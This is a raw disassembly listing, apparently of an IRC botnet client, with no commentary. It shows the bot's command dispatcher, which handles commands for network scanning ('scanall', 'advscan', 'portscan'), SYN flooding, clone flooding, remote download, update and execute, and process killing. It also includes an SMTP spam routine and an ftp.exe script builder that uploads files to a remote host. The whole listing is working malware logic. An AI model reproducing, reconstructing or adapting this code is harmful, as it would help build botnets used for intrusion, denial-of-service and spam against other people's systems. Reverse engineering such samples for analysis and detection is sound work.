test eax, eax
pop ecx
jz loc_40C5A6
push edi
push offset aSrv_tftpserver ; "srv.tftpserver.on"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C468
push edi
push offset aSrv_tftp_on ; "srv.tftp.on"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C468
push edi
push offset aScanall ; "scanall"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C15B
push edi
push offset aScan_a ; "scan.a"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C15B
mov eax, [ebp+esi+var_9C]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_408B77
push edi
push offset aNick_0 ; "nick"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C136
push edi
push offset aN ; "n"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C136
push edi
push offset aJoin ; "join"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C112
push edi
push offset aJ ; "j"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C112
push edi
push offset aPart_0 ; "part"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C0F8
push edi
push offset aPt ; "pt"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C0F8
push edi
push offset aRaw ; "raw"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C0C2
push edi
push offset aR ; "r"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C0C2
push edi
push offset aKillthread ; "killthread"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BFFD
push edi
push offset aK ; "k"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BFFD
push edi
push offset aClone_quit ; "clone.quit"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BF51
push edi
push offset aClone_q ; "clone.q"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BF51
push edi
push offset aClone_rndnick ; "clone.rndnick"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BF05
push edi
push offset aClone_rn ; "clone.rn"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BF05
push edi
push offset aPrefix ; "prefix"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BEEC
push edi
push offset aPr ; "pr"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BEEC
push edi
push offset aOpen ; "open"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BEBE
push edi
push offset aO ; "o"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BEBE
push edi
push offset aNewserver ; "newserver"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BE95
push edi
push offset aIrc_news ; "irc.news"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BE95
push edi
push offset aDns ; "dns"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BE22
push edi
push offset aDn ; "dn"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BE22
push edi
push offset aKillproc ; "killproc"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BDF2
push edi
push offset aKp ; "kp"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BDF2
push edi
push offset aKill ; "kill"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BD93
push edi
push offset aKi ; "ki"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BD93
push edi
push offset aDelete ; "delete"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BD58
push edi
push offset aDel ; "del"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BD58
push edi
push offset aVisit ; "visit"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BC76
push edi
push offset aV ; "v"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BC76
push edi
push offset aMirccmd ; "mirccmd"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BC39
push edi
push offset aMirc ; "mirc"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BC39
push edi
push offset aReadfile ; "readfile"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BBAE
push edi
push offset aRf ; "rf"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BBAE
push edi
push offset aSrv_ident ; "srv.ident"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_409E61
push [ebp+arg_10]
push offset aOn ; "on"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409E19
push 2
call sub_4010E6
test eax, eax
pop ecx
jle short loc_409DBC
push offset unk_42F27C
jmp loc_409E4E
; ---------------------------------------------------------------------------
loc_409DBC: ; CODE XREF: sub_4087B3+15FD�j
lea eax, [ebp+var_2E4]
push offset unk_42D1DC
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 2
push eax
call sub_40105F
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_401195
push ebx
push ebx
call ds:dword_49532C ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E934[esi], eax
jnz loc_40B330
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42D190
jmp loc_40CFA0
; ---------------------------------------------------------------------------
loc_409E19: ; CODE XREF: sub_4087B3+15F1�j
push [ebp+arg_10]
push offset dword_42F278
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40B330
push ebx
push 2
call sub_401285
pop ecx
cmp eax, ebx
pop ecx
jle short loc_409E49
push eax
push offset unk_42F22C
jmp loc_40CFA0
; ---------------------------------------------------------------------------
loc_409E49: ; CODE XREF: sub_4087B3+1689�j
push offset unk_42F1F8
loc_409E4E: ; CODE XREF: sub_4087B3+1604�j
; sub_4087B3+3CC6�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
pop ecx
pop ecx
jmp loc_40B330
; ---------------------------------------------------------------------------
loc_409E61: ; CODE XREF: sub_4087B3+15DA�j
push edi
push offset dword_42F1F4
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40A11D
cmp dword_49172C, ebx
jz short loc_409E90
cmp dword_491754, ebx
jz short loc_409E90
push offset unk_42F1A4
jmp loc_40A0ED
; ---------------------------------------------------------------------------
loc_409E90: ; CODE XREF: sub_4087B3+16C9�j
; sub_4087B3+16D1�j
cmp [ebp+var_C], ebx
jz loc_40A0FB
mov edi, [ebp+esi+var_98]
mov [ebp+arg_0], ebx
cmp edi, ebx
jz short loc_409EB5
push edi
push [ebp+var_C]
call sub_417760
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_409EB5: ; CODE XREF: sub_4087B3+16F2�j
push [ebp+arg_10]
push offset aStart ; "start"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409F1C
cmp edi, ebx
jz short loc_409EF0
push [ebp+arg_0]
push 3
loc_409ED1: ; CODE XREF: sub_4087B3+1781�j
; sub_4087B3+179B�j ...
call sub_4010C3
push eax
lea eax, [ebp+var_2E4]
push offset aS_2 ; "%s"
push eax
call sub_416821
add esp, 14h
jmp loc_40A0FB
; ---------------------------------------------------------------------------
loc_409EF0: ; CODE XREF: sub_4087B3+1717�j
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010E1
add esp, 0Ch
test eax, eax
jz short loc_409F12
push offset unk_42F164
jmp loc_40A0ED
; ---------------------------------------------------------------------------
loc_409F12: ; CODE XREF: sub_4087B3+1753�j
push offset unk_42F130
jmp loc_40A0ED
; ---------------------------------------------------------------------------
loc_409F1C: ; CODE XREF: sub_4087B3+1713�j
push [ebp+arg_10]
push offset aStop ; "stop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409F36
push [ebp+arg_0]
push 4
jmp short loc_409ED1
; ---------------------------------------------------------------------------
loc_409F36: ; CODE XREF: sub_4087B3+177A�j
push [ebp+arg_10]
push offset aPause ; "pause"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409F50
push [ebp+arg_0]
push 5
jmp short loc_409ED1
; ---------------------------------------------------------------------------
loc_409F50: ; CODE XREF: sub_4087B3+1794�j
push [ebp+arg_10]
push offset aContinue ; "continue"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409F6D
push [ebp+arg_0]
push 6
jmp loc_409ED1
; ---------------------------------------------------------------------------
loc_409F6D: ; CODE XREF: sub_4087B3+17AE�j
push [ebp+arg_10]
push offset aDelete ; "delete"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409F8A
push [ebp+arg_0]
push 1
jmp loc_409ED1
; ---------------------------------------------------------------------------
loc_409F8A: ; CODE XREF: sub_4087B3+17CB�j
push [ebp+arg_10]
push offset aShare ; "share"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40A004
cmp edi, ebx
jz short loc_409FD7
cmp [ebp+var_9B0], bl
jz short loc_409FAF
push ebx
push edi
push 1
jmp short loc_409FB8
; ---------------------------------------------------------------------------
loc_409FAF: ; CODE XREF: sub_4087B3+17F4�j
push [ebp+esi+var_94]
push edi
push ebx
loc_409FB8: ; CODE XREF: sub_4087B3+17FA�j
call sub_40117C
push eax
lea eax, [ebp+var_2E4]
push offset aS_2 ; "%s"
push eax
call sub_416821
add esp, 18h
jmp loc_40A0FB
; ---------------------------------------------------------------------------
loc_409FD7: ; CODE XREF: sub_4087B3+17EC�j
push ebx
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4011A9
add esp, 10h
test eax, eax
jz short loc_409FFA
push offset unk_42F0D8
jmp loc_40A0ED
; ---------------------------------------------------------------------------
loc_409FFA: ; CODE XREF: sub_4087B3+183B�j
push offset unk_42F0A8
jmp loc_40A0ED
; ---------------------------------------------------------------------------
loc_40A004: ; CODE XREF: sub_4087B3+17E8�j
push [ebp+arg_10]
push offset aUser_1 ; "user"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40A09F
cmp edi, ebx
jz short loc_40A078
cmp [ebp+var_9B0], bl
jz short loc_40A039
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
push ebx
push edi
push 1
jmp short loc_40A059
; ---------------------------------------------------------------------------
loc_40A039: ; CODE XREF: sub_4087B3+1872�j
push [ebp+var_4]
mov esi, [ebp+esi+var_94]
cmp esi, ebx
push [ebp+var_98]
push [ebp+arg_4]
jz short loc_40A055
push esi
push edi
push ebx
jmp short loc_40A059
; ---------------------------------------------------------------------------
loc_40A055: ; CODE XREF: sub_4087B3+189B�j
push ebx
push edi
push 2
loc_40A059: ; CODE XREF: sub_4087B3+1884�j
; sub_4087B3+18A0�j
call sub_40102D
push eax
lea eax, [ebp+var_2E4]
push offset aS_2 ; "%s"
push eax
call sub_416821
add esp, 24h
jmp loc_40A0FB
; ---------------------------------------------------------------------------
loc_40A078: ; CODE XREF: sub_4087B3+186A�j
push ebx
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4011FE
add esp, 10h
test eax, eax
jz short loc_40A098
push offset unk_42F074
jmp short loc_40A0ED
; ---------------------------------------------------------------------------
loc_40A098: ; CODE XREF: sub_4087B3+18DC�j
push offset unk_42F044
jmp short loc_40A0ED
; ---------------------------------------------------------------------------
loc_40A09F: ; CODE XREF: sub_4087B3+1862�j
push [ebp+arg_10]
push offset aSend ; "send"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40A0E8
cmp edi, ebx
jz short loc_40A0E1
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40127B
push eax
lea eax, [ebp+var_2E4]
push offset aS_2 ; "%s"
push eax
call sub_416821
add esp, 1Ch
jmp short loc_40A0FB
; ---------------------------------------------------------------------------
loc_40A0E1: ; CODE XREF: sub_4087B3+1901�j
push offset unk_42F008
jmp short loc_40A0ED
; ---------------------------------------------------------------------------
loc_40A0E8: ; CODE XREF: sub_4087B3+18FD�j
push offset unk_42EFD8
loc_40A0ED: ; CODE XREF: sub_4087B3+16D8�j
; sub_4087B3+175A�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_416821
pop ecx
pop ecx
loc_40A0FB: ; CODE XREF: sub_4087B3+16E0�j
; sub_4087B3+1738�j ...
cmp [ebp+var_8], ebx
jnz loc_40B5AF
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
jmp loc_40B5A7
; ---------------------------------------------------------------------------
loc_40A11D: ; CODE XREF: sub_4087B3+16BD�j
push edi
push offset aGethost ; "gethost"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BAC0
push edi
push offset aGh ; "gh"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BAC0
mov eax, [ebp+esi+var_98]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_408B77
push edi
push offset aAddalias ; "addalias"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BA7D
push edi
push offset aAa ; "aa"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BA7D
push edi
push offset aPrivmsg_0 ; "privmsg"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BA23
push edi
push offset aPm_0 ; "pm"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40BA23
push edi
push offset aAction ; "action"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B9B1
push edi
push offset aA_0 ; "a"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B9B1
push edi
push offset aCycle ; "cycle"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B949
push edi
push offset aCy ; "cy"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B949
push edi
push offset aMode ; "mode"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B910
push edi
push offset aM_0 ; "m"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B910
push edi
push offset aClone_raw ; "clone.raw"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B8A2
push edi
push offset aClone_r ; "clone.r"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B8A2
push edi
push offset aClone_mode ; "clone.mode"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B81D
push edi
push offset aClone_m ; "clone.m"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B81D
push edi
push offset aClone_nick ; "clone.nick"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B7AC
push edi
push offset aClone_n ; "clone.n"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B7AC
push edi
push offset aClone_join ; "clone.join"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B784
push edi
push offset aClone_j ; "clone.j"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B784
push edi
push offset aClone_part ; "clone.part"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B71E
push edi
push offset aClone_p ; "clone.p"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B71E
push edi
push offset aRepeat ; "repeat"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B656
push edi
push offset aRp ; "rp"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B656
push edi
push offset aDelay ; "delay"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B5B7
push edi
push offset aDe ; "de"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B5B7
push edi
push offset aUpdate ; "update"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B3FD
push edi
push offset aUpdate ; "update"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B3FD
push edi
push offset aExecute ; "execute"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B368
push edi
push offset aE ; "e"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B368
push edi
push offset aRename ; "rename"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B2E0
push edi
push offset aMv ; "mv"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B2E0
mov eax, [ebp+esi+var_94]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_408B77
push edi
push offset aClone_make ; "clone.make"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B1F3
push edi
push offset aC_make ; "c.make"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B1F3
push edi
push offset aSyn ; "syn"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B0F2
push edi
push offset aSyn ; "syn"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40B0F2
push edi
push offset aDownload ; "download"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40AFB0
push edi
push offset aDownload ; "download"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40AFB0
push edi
push offset aSrv_redirect_o ; "srv.redirect.on"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40AEB4
push edi
push offset aSrv_rd_on ; "srv.rd.on"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40AEB4
push edi
push offset aPortscan ; "portscan"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40ADBF
push edi
push offset aSc ; "sc"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40ADBF
push edi
push offset aClone_privmsg ; "clone.privmsg"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40ACE5
push edi
push offset aClone_pm ; "clone.pm"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40ACE5
push edi
push offset aClone_action ; "clone.action"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40ABCE
push edi
push offset aClone_a ; "clone.a"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40ABCE
mov eax, [ebp+esi+var_90]
cmp eax, ebx
mov [ebp+arg_8], eax
jz loc_408B77
push edi
push offset aAdvscan ; "advscan"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40A87B
push edi
push offset aAsc ; "asc"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40A87B
push edi
push offset aEmail ; "email"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40A6E6
push [ebp+arg_10]
lea eax, [ebp+var_3E4]
push eax
call sub_4175D0
push [ebp+arg_18]
call sub_416CCF
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_D9C]
push eax
call sub_4175D0
push [ebp+arg_8]
lea eax, [ebp+var_B94]
push eax
call sub_4175D0
push offset asc_42BFC4 ; " "
push offset a_ ; "_"
push [ebp+esi+var_8C]
call sub_40113B
push eax
lea eax, [ebp+var_548]
push eax
call sub_4175D0
add esp, 30h
lea eax, [ebp+var_6F4]
push eax
push 101h
call dword_4915D4 ; WSAStartup
lea eax, [ebp+var_3E4]
push eax
call dword_4916E0 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_4916DC ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_D8], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_D4], eax
call dword_49165C ; htons
mov [ebp+var_D6], ax
lea eax, [ebp+var_548]
push eax
lea eax, [ebp+var_D9C]
push eax
lea eax, [ebp+var_548]
push eax
lea eax, [ebp+var_B94]
push eax
lea eax, [ebp+var_D9C]
push eax
lea eax, [ebp+var_159C]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_416821
add esp, 1Ch
lea eax, [ebp+var_D8]
push 10h
push eax
push esi
call dword_491604 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_C98]
push edi
push eax
push esi
call dword_491674 ; recv
lea eax, [ebp+var_C98]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_159C]
push eax
push esi
call dword_4916AC ; send
push ebx
lea eax, [ebp+var_C98]
push edi
push eax
push esi
call dword_491674 ; recv
push esi
call dword_4916F4 ; closesocket
call dword_4915BC ; WSACleanup
lea eax, [ebp+var_B94]
push eax
push offset unk_42ED84
loc_40A6AD: ; CODE XREF: sub_4087B3+2B28�j
; sub_4087B3+2C45�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
loc_40A6BC: ; CODE XREF: sub_4087B3+2B0C�j
; sub_4087B3+2BF7�j ...
cmp [ebp+var_8], ebx
jnz loc_40CC93
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
jmp loc_40CC93
; ---------------------------------------------------------------------------
loc_40A6E6: ; CODE XREF: sub_4087B3+1D9F�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz loc_408B77
push edi
push offset aFtp_upload ; "ftp.upload"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40D023
push 4
push esi
call sub_401005
pop ecx
test eax, eax
pop ecx
jnz short loc_40A74F
push esi
push offset dword_42ED40
loc_40A71E: ; CODE XREF: sub_4087B3+2416�j
; sub_4087B3+386C�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
loc_40A72D: ; CODE XREF: sub_4087B3+23FA�j
; sub_4087B3+3308�j ...
cmp [ebp+var_8], ebx
jnz loc_40CEDA
push ebx
push [ebp+var_4]
loc_40A73A: ; CODE XREF: sub_4087B3+2A3B�j
lea eax, [ebp+var_2E4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
jmp loc_40C73B
; ---------------------------------------------------------------------------
loc_40A74F: ; CODE XREF: sub_4087B3+1F63�j
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
pop ecx
call sub_416B18
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_416B18
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_416B18
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_C9C]
push edx
push eax
lea eax, [ebp+var_B98]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_416821
lea eax, [ebp+var_B98]
push offset aAb ; "ab"
push eax
call sub_417012
mov edi, eax
add esp, 20h
cmp edi, ebx
jz loc_408B77
push esi
push [ebp+arg_8]
push [ebp+arg_0]
push [ebp+arg_18]
push [ebp+arg_10]
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push edi
call sub_417AD3
push edi
call sub_416D94
lea eax, [ebp+var_B98]
push eax
lea eax, [ebp+var_3E4]
push offset aSS_4 ; "-s:%s"
push eax
call sub_416821
add esp, 2Ch
lea eax, [ebp+var_3E4]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_4915D0
push [ebp+arg_10]
test eax, eax
push esi
jz short loc_40A81A
push offset dword_42ECB0
jmp short loc_40A81F
; ---------------------------------------------------------------------------
loc_40A81A: ; CODE XREF: sub_4087B3+205E�j
push offset dword_42EC6C
loc_40A81F: ; CODE XREF: sub_4087B3+2065�j
call sub_416821
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40A848
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40A848: ; CODE XREF: sub_4087B3+2077�j
lea eax, [ebp+var_2E4]
push eax
call sub_401014
loc_40A854: ; CODE XREF: sub_4087B3+20C6�j
lea eax, [ebp+var_B98]
push 4
push eax
call sub_401005
add esp, 0Ch
test eax, eax
jz loc_408B77
lea eax, [ebp+var_B98]
push eax
call sub_417A9E
jmp short loc_40A854
; ---------------------------------------------------------------------------
loc_40A87B: ; CODE XREF: sub_4087B3+1D75�j
; sub_4087B3+1D8A�j
push 8
call sub_4010E6
push [ebp+arg_18]
mov edi, eax
call sub_416CCF
add eax, edi
pop ecx
cmp eax, 0C8h
pop ecx
jle short loc_40A8C7
push edi
loc_40A898: ; DATA XREF: .data:0042AA94�o
; .data:0042AAD8�o ...
lea eax, [ebp+var_2E4]
push offset dword_42EC14
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
jmp loc_40BA75
; ---------------------------------------------------------------------------
loc_40A8C7: ; CODE XREF: sub_4087B3+20E2�j
push [ebp+arg_10]
call sub_416CCF
push [ebp+arg_18]
mov [ebp+var_31C], eax
call sub_416CCF
push [ebp+arg_0]
mov [ebp+var_304], eax
call sub_416CCF
add esp, 0Ch
cmp eax, 5
mov [ebp+var_318], eax
jnb short loc_40A902
push 5
pop eax
mov [ebp+var_318], eax
loc_40A902: ; CODE XREF: sub_4087B3+2144�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40A90F
mov [ebp+var_318], ecx
loc_40A90F: ; CODE XREF: sub_4087B3+2154�j
push [ebp+arg_8]
call sub_416CCF
mov [ebp+var_314], eax
mov eax, 320h
cmp [ebp+var_314], eax
pop ecx
jbe short loc_40A931
mov [ebp+var_314], eax
loc_40A931: ; CODE XREF: sub_4087B3+2176�j
or [ebp+var_300], 0FFFFFFFFh
cmp dword_42AF28, ebx
mov [ebp+arg_8], ebx
jz short loc_40A980
mov edi, offset dword_42AF28
loc_40A948: ; CODE XREF: sub_4087B3+21AF�j
push [ebp+arg_10]
lea eax, [edi-28h]
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_40A966
inc [ebp+arg_8]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_40A948
jmp short loc_40A980
; ---------------------------------------------------------------------------
loc_40A966: ; CODE XREF: sub_4087B3+21A5�j
mov eax, [ebp+arg_8]
mov ecx, eax
mov [ebp+var_300], eax
imul ecx, 3Ch
mov ecx, dword_42AF28[ecx]
mov [ebp+var_31C], ecx
loc_40A980: ; CODE XREF: sub_4087B3+218E�j
; sub_4087B3+21B1�j
cmp [ebp+var_31C], ebx
jz loc_40C450
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_40A9CA
cmp byte ptr [edi], 23h
jz short loc_40A9CA
push edi
lea eax, [ebp+var_430]
push 10h
push eax
call sub_4163D7
push 78h
push edi
call sub_417B60
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_2F0], eax
jmp loc_40AA9E
; ---------------------------------------------------------------------------
loc_40A9CA: ; CODE XREF: sub_4087B3+21E5�j
; sub_4087B3+21EA�j
cmp [ebp+var_9B3], bl
jnz short loc_40A9EC
cmp [ebp+var_9B2], bl
jnz short loc_40A9EC
cmp [ebp+var_9A2], bl
jnz short loc_40A9EC
push offset dword_42EBC8
jmp loc_40C455
; ---------------------------------------------------------------------------
loc_40A9EC: ; CODE XREF: sub_4087B3+221D�j
; sub_4087B3+2225�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
lea eax, [ebp+var_D8]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call dword_491600 ; getsockname
mov al, [ebp+var_9B3]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp+var_430]
push eax
call sub_416A10
add esp, 0Ch
cmp [ebp+var_9A2], bl
jz short loc_40AA98
xor eax, eax
cmp [ebp+var_9B3], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_430]
push eax
call sub_4169E0
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_40AA8C
loc_40AA6A: ; CODE XREF: sub_4087B3+22D7�j
cmp eax, ebx
jz short loc_40AA8C
mov byte ptr [eax], 78h
lea eax, [ebp+var_430]
push 30h
push eax
call sub_4169E0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_40AA6A
loc_40AA8C: ; CODE XREF: sub_4087B3+22B5�j
; sub_4087B3+22B9�j
mov [ebp+var_2F0], 1
jmp short loc_40AA9E
; ---------------------------------------------------------------------------
loc_40AA98: ; CODE XREF: sub_4087B3+228F�j
mov [ebp+var_2F0], ebx
loc_40AA9E: ; CODE XREF: sub_4087B3+2212�j
; sub_4087B3+22E3�j
mov eax, [ebp+arg_4]
push [ebp+var_98]
mov [ebp+var_320], eax
mov eax, [ebp+var_4]
mov [ebp+var_2F8], eax
mov eax, [ebp+var_8]
mov [ebp+var_2F4], eax
mov edi, 80h
lea eax, [ebp+var_420]
push edi
push eax
call sub_4163D7
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jz short loc_40AAF2
loc_40AADF: ; CODE XREF: sub_4087B3+2362�j
push esi
loc_40AAE0: ; CODE XREF: sub_4087B3+234C�j
lea eax, [ebp+var_3A0]
push edi
push eax
call sub_4163D7
add esp, 0Ch
jmp short loc_40AB1D
; ---------------------------------------------------------------------------
loc_40AAF2: ; CODE XREF: sub_4087B3+232A�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_40AB01
cmp byte ptr [eax], 23h
jnz short loc_40AB01
push eax
jmp short loc_40AAE0
; ---------------------------------------------------------------------------
loc_40AB01: ; CODE XREF: sub_4087B3+2344�j
; sub_4087B3+2349�j
